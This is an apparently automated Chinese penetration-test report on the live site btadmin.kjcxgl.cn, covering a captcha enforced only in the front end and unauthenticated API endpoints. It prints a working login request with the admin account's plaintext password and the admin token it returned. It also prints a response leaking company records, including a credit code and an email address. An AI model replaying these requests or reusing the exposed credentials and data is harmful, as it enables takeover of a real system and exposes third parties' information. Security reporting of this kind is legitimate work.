渗透测试报告
Web 应用安全评估
https://btadmin.kjcxgl.cn/ · Nginx Vue.Js Element Ui
VUL-2026-XTGQ6
测试时间 2026-05-28
测试工具 vibe-pentest-agent-v1
置信级别 Confirmed
目标 · https://btadmin.kjcxgl.cn/  |  技术栈 · Nginx Vue.Js Element Ui
执行摘要
2
总计
0
严重
1
高危
1
中危
0
低危
0
信息
漏洞数量分布
漏洞类型占比
测试范围
目标 URL
https://btadmin.kjcxgl.cn/
报告编号
VUL-2026-XTGQ6
生成时间
2026-05-28 02:28:04 UTC
技术栈
Nginx Vue.Js Element Ui
漏洞详情
等级筛选:
严重0
高危1
中危1
低危0
信息0
编号 漏洞标题 危险等级 漏洞类型 置信度 目标地址
VUL-001 验证码未在服务端强制校验 高危 未分类 confirmed
https://btadmin.kjcxgl.cn/api/v1/user/sign-in
漏洞描述
登录接口 /api/v1/user/sign-in 接受空的 graph_code 参数,验证码仅在前端校验,服务端未验证。攻击者可绕过验证码进行暴力破解。
HTTP 交互记录
空验证码登录请求
REQUEST
POST https://btadmin.kjcxgl.cn/api/v1/user/sign-in
Content-Type: application/json
{"account": "admin", "password": "KJJjhc@123", "graph_code": "", "key": "eyJpdi...IiJ9"}
RESPONSE
HTTP/1.1 200
{"data": {"token": "eyJ0eX...MhpA", "access_token": "eyJ0eX...MhpA", "id": 1, "role": 1}, "error_msg": "", "code": 20000}
修复建议
  1. 针对该漏洞类型进行专项分析和修复
  2. 参考OWASP Top 10和对应技术栈的安全最佳实践
  3. 建议进行代码安全审计确认具体风险
  4. 根据实际漏洞利用场景制定针对性修复方案。
VUL-002 API接口未授权访问 中危 访问控制缺陷 confirmed
https://btadmin.kjcxgl.cn/
漏洞描述
以下API接口无需认证即可访问,泄露系统信息:/api/v1/user-company/graph-code, /api/v1/user-company/getStudyCompany
HTTP 交互记录
未授权API访问测试
REQUEST
POST https://btadmin.kjcxgl.cn/api/v1/user-company/graph-code
Content-Type: application/json
{}
RESPONSE
HTTP/1.1 200
{"data":{"current_page":1,"data":[{"id":6,"user_company_id":10,"company_name":"\u5305\u5934\u957f\u5b89\u6c38\u78c1\u7535\u673a\u6709\u9650\u516c\u53f8","credit_code":"9115029123989697XH","company_type":1,"company_region":11,"detailed_address":"\u5bcc\u5f3a\u5357\u8def169\u53f7","company_phone":null,"postcode":"014030","company_email":"363704802@qq.com","valid_documentation_location":"https:\/\/bt.kjcxgl.cn\/\/api\/v1\/..\/..\/company\/license\/2020-05-15\/2020-05-15-09-32-588XlHy.jpg","person_n
修复建议
  1. 实施最小权限原则,默认拒绝所有未明确授权的请求
  2. 在API/路由层实施统一的权限校验中间件
  3. 对敏感操作实施多因素认证(MFA)
  4. 确保会话Cookie设置HttpOnly、Secure、SameSite标志
  5. 登录后重新生成会话标识符防止会话固定攻击。
免责声明

重要声明

本报告由人工智能辅助安全评估系统自动生成。尽管本系统采用了行业标准的漏洞检测方法和验证流程, 但基于自动化测试的固有局限性,报告中的发现可能存在误报、漏报或上下文理解偏差。

使用本报告的各方应注意以下事项:

本报告仅供参考,最终安全决策应由具备专业知识的安全团队做出。